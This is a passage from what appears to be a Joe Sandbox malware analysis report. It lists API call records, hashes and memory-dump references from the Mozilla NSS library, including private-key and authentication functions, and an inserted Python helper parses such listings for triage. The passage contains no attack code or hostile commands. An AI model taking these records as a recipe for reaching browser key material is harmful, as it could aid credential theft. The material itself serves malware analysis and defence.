                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C408255
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C408260
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeavememcpysqlite3_free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1525636458-0
                                                                                                                                                                                                                          • Opcode ID: 60b6e31b6c6986ed9c6c7015aaaee0fda872f99f5e3f7c1808f213273373ed10
                                                                                                                                                                                                                          • Instruction ID: 5aedd396dadee67c696c436e6268cbec7b1e1be259a2ae1a181577f3814397ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60b6e31b6c6986ed9c6c7015aaaee0fda872f99f5e3f7c1808f213273373ed10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5919B71B816088BEB04DFE0DE49FADB7B1BF06305F16403ED416AB640DB396945CB8A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E1D8F
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4E1DA6
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C4E1E13
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4E1ED0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
• String ID:
• API String ID: 84796498-0
• Opcode ID: f7223f3220f5b96438945335279ee27fe37ba1cc190a4f04edc4a7c5f879d44f
• Instruction ID: 231a26998dc301a4b09e16a835918b02cc32040d2ddb5e336be79b45d47258a6
• Opcode Fuzzy Hash: f7223f3220f5b96438945335279ee27fe37ba1cc190a4f04edc4a7c5f879d44f
• Instruction Fuzzy Hash: 2A514675A403098BDB00CF98C884FAEB7B6BF4931AF164129E81A9B752D731E945CB90
APIs
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C4185D2,00000000,?,?), ref: 6C534FFD
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C53500C
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5350C8
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5350D6
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: _byteswap_ulong
• String ID:
• API String ID: 4101233201-0
• Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
• Instruction ID: 21d229a5fe89ea2fb25f629b033f3a51f0d2a9ae5c76ea73118796a6f40ad817
• Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
• Instruction Fuzzy Hash: F6417DB6A012218BCB18CF18DCD179AB7E1BF4431871D5669D84ACBB02F379E891CB81
APIs
• sqlite3_initialize.NSS3(00000000,?,?,?,6C45FDFE), ref: 6C45FFAD
  • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
  • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
• memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6C45FDFE), ref: 6C45FFDF
• EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6C45FDFE), ref: 6C46001C
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6C45FDFE), ref: 6C46006F
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
• String ID:
• API String ID: 2358433136-0
• Opcode ID: 63b188da15b7ada5db23269b4da4f025dc893a3581ee799a1cc4ae35154e34e6
• Instruction ID: 975cc34d86e1ceaa033ba463a0f9b0e150c8ed643f8244cb294b80f2ec1af549
• Opcode Fuzzy Hash: 63b188da15b7ada5db23269b4da4f025dc893a3581ee799a1cc4ae35154e34e6
• Instruction Fuzzy Hash: 5541ED71B002158BDB08DFA5EC85EAEB7B0FB45315F05002DD806A7B01EB3AA941CBE9
APIs
  • Part of subcall function 6C58A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C58A662), ref: 6C58A69E
  • Part of subcall function 6C58A690: PR_NewCondVar.NSS3(?), ref: 6C58A6B4
• PR_IntervalNow.NSS3 ref: 6C58A8C6
• EnterCriticalSection.KERNEL32(?), ref: 6C58A8EB
• _PR_MD_UNLOCK.NSS3(?), ref: 6C58A944
• PR_SetPollableEvent.NSS3(?), ref: 6C58A94F
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
• String ID:
• API String ID: 811965633-0
• Opcode ID: 7cfc1330e3eb48d672cfbaaec6d9a35c54425f9c8fbff917622fc46a91cb1772
• Instruction ID: e3846dac8e25f295d322a2b58b9beb2c163f84e87a849ad2926ae8ab1988c1ec
• Opcode Fuzzy Hash: 7cfc1330e3eb48d672cfbaaec6d9a35c54425f9c8fbff917622fc46a91cb1772
• Instruction Fuzzy Hash: FB4137B4A06A22DFC704CF29C98095AFBF1FF88318725856AD959CBB51E731E850CF90
APIs
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547E10
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547EA6
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547EB5
• _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C547ED8
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: _byteswap_ulong
• String ID:
• API String ID: 4101233201-0
• Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
• Instruction ID: 729386f416a8a38842f4134daee79746ecc5324be2f3268c2bbbe254574dae3a
• Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
• Instruction Fuzzy Hash: 4231A4B1A011118FDB04CF18CC9099EBBE2BFC831871B8669C8585BB12EB71EC55CBD1
APIs
  • Part of subcall function 6C483090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C49AE42), ref: 6C4830AA
  • Part of subcall function 6C483090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4830C7
  • Part of subcall function 6C483090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C4830E5
  • Part of subcall function 6C483090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C483116
  • Part of subcall function 6C483090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C48312B
  • Part of subcall function 6C483090: PK11_DestroyObject.NSS3(?,?), ref: 6C483154
  • Part of subcall function 6C483090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C48317E
• SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C4FDBBD), ref: 6C4FDFCF
• SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4FDFEE
  • Part of subcall function 6C4986D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C498716
  • Part of subcall function 6C4986D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C498727
  • Part of subcall function 6C4986D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C49873B
  • Part of subcall function 6C4986D0: PR_Unlock.NSS3(?), ref: 6C49876F
  • Part of subcall function 6C4986D0: PR_SetError.NSS3(00000000,00000000), ref: 6C498787
  • Part of subcall function 6C4BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C4BF854
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C4BF868
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C4BF882
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C4BF889
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C4BF8A4
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C4BF8AB
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C4BF8C9
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C4BF8D0
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6C4FDBBD), ref: 6C4FDFFC
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,6C4FDBBD), ref: 6C4FE007
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3730430729-0
                                                                                                                                                                                                                          • Opcode ID: 3ac3b98e3f5be8536b347307e4a21c6e1f2f725d792f7386c4d39a7d5fc2ffa8
                                                                                                                                                                                                                          • Instruction ID: 422770f80ad250f4658458c3f5237ea45c6302ac3342e1bf4af9b36e86da6a40
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ac3b98e3f5be8536b347307e4a21c6e1f2f725d792f7386c4d39a7d5fc2ffa8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9831E4B0A0520157E700EE79AC85F9B73B89F8530DF050139E91AD7B12FB25E909C2F2
APIs
• PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C476C8D
• memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C476CA9
• PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C476CC0
• SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C598FE0), ref: 6C476CFE
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Alloc_Arena$EncodeItem_memset
• String ID:
• API String ID: 2370200771-0
• Opcode ID: 244385f3578d83f37ca9adba8f98bf9d1577fd52ab100560e848372b7bb17677
• Instruction ID: ee4467573021c97f3681aa39ca6a646853cf66b353c82cec8130079f225be18b
• Opcode Fuzzy Hash: 244385f3578d83f37ca9adba8f98bf9d1577fd52ab100560e848372b7bb17677
• Instruction Fuzzy Hash: 15319EB5A012169FEB18DF65C891EFFBBFAEB45248B10442DD905D7700EB319905CBA0
APIs
• CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C584F5D
• free.MOZGLUE(?), ref: 6C584F74
• free.MOZGLUE(?), ref: 6C584F82
• GetLastError.KERNEL32 ref: 6C584F90
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: free$CreateErrorFileLast
• String ID:
• API String ID: 17951984-0
• Opcode ID: 6aca86e0f592b39e87ab1cf1ef6b8ee23b938de03b229daa086d3256f519f972
• Instruction ID: b737a11ea2e4bd8b229a847f1895bf220286905af329ca73929f15823929680d
• Opcode Fuzzy Hash: 6aca86e0f592b39e87ab1cf1ef6b8ee23b938de03b229daa086d3256f519f972
• Instruction Fuzzy Hash: DC3148B5A016294BEB01CB69DC91BDFB3BCFF85348F05022DEC15A7780EB34A905C691
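Reading these "APIs" listings by eye does not scale across the hundreds of function records in a report like this one. The following is an added triage helper, not Joe Sandbox code and not part of this report: it parses bullet lines of the shape shown above (`Func.MODULE(args), ref: addr`, optionally prefixed by `Part of subcall function addr:`), counts which modules a function touches, and decodes the `dwDesiredAccess` / `dwShareMode` arguments of any `CreateFileA` call with the standard Win32 flag values, so a record such as `CreateFileA.KERNEL32(?,40000000,00000003,...)` reads as "GENERIC_WRITE, shared read/write" without a lookup. The sample input is constructed in the shape of the listing, `?` arguments are reported as unknown rather than guessed, and the line grammar is an assumption drawn from the records visible on this page.

```python
import re
from collections import Counter

# Constructed sample in the shape of the report's "APIs" bullets (not copied from a real run;
# the values mirror the kinds of entries seen in the listing above).
SAMPLE_APIS = """\
• SECKEY_CopyPrivateKey.NSS3(00000000,?,?,6C4FDBBD), ref: 6C4FDFCF
  • Part of subcall function 6C4986D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000), ref: 6C498716
• CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C584F5D
• GetLastError.KERNEL32 ref: 6C584F90
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4FE007
"""

# One bullet: optional "Part of subcall function <addr>:" prefix, then Func.MODULE(args), ref: <addr>.
# Calls with no recorded arguments (e.g. "GetLastError.KERNEL32 ref: ...") have no parentheses or comma.
# This grammar is an assumption based on the records visible in the report, not a documented format.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Standard Win32 flag values for CreateFileA/W dwDesiredAccess and dwShareMode.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}


def parse_api_lines(text):
    """Turn the bullet listing into records; lines that do not match are skipped, not guessed at."""
    records = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        records.append({"func": m.group("func"), "module": m.group("mod"),
                        "args": args, "ref": m.group("ref"), "subcall_of": m.group("sub")})
    return records


def _flags(value, table):
    """Name every known bit in value; any bits outside the table are kept as a hex remainder."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return names


def decode_createfile(record):
    """Decode dwDesiredAccess/dwShareMode of a CreateFileA/W record; '?' arguments stay unknown."""
    if record["func"] not in ("CreateFileA", "CreateFileW") or len(record["args"]) < 3:
        return None
    access, share = record["args"][1], record["args"][2]
    return {
        "access": _flags(int(access, 16), GENERIC_ACCESS) if access != "?" else ["unknown"],
        "share": _flags(int(share, 16), SHARE_MODE) if share != "?" else ["unknown"],
        "ref": record["ref"],
    }


def module_counts(records):
    """How many calls land in each module (NSS3, MOZGLUE, KERNEL32, ...)."""
    return Counter(r["module"] for r in records)


def triage(text):
    """The summary a reviewer wants first: modules touched, subcalls involved, and what is opened for writing."""
    records = parse_api_lines(text)
    writes = [d for d in map(decode_createfile, records) if d and "GENERIC_WRITE" in d["access"]]
    return {"modules": module_counts(records), "file_writes": writes,
            "subcalls": sorted({r["subcall_of"] for r in records if r["subcall_of"]})}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_APIS).items():
        print(key, value)
```

Paste a whole "APIs" section into `triage()` to get the module mix and every write-mode file open in one pass; anything the report recorded as `?` is carried through as unknown so the summary never claims more than the sandbox observed.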
APIs
• PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C4CDDB1,?,00000000), ref: 6C4CDDF4
  • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
  • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
  • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
• PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C4CDDB1,?,00000000), ref: 6C4CDE0B
• PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C4CDDB1,?,00000000), ref: 6C4CDE17
  • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
  • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
• PR_SetError.NSS3(FFFFE009,00000000), ref: 6C4CDE80
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
• String ID:
• API String ID: 3725328900-0
• Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
• Instruction ID: 4c979dc6d2b5743ad676ddee041ea5e964990721235e655728530f1808123b8d
• Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
• Instruction Fuzzy Hash: D31D6B5A41B429BE700CF56C890E52F7E4FFA5318B24822ED81C87B11E770F4A4CB82
APIs
• TlsGetValue.KERNEL32(6C495ADC,?,00000000,00000001,?,?,00000000,?,6C48BA55,?,?), ref: 6C4BFE4B
• EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4BFE5F
• PR_Unlock.NSS3(78831D74), ref: 6C4BFEC2
• PR_SetError.NSS3(00000000,00000000), ref: 6C4BFED6
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                          • String ID:
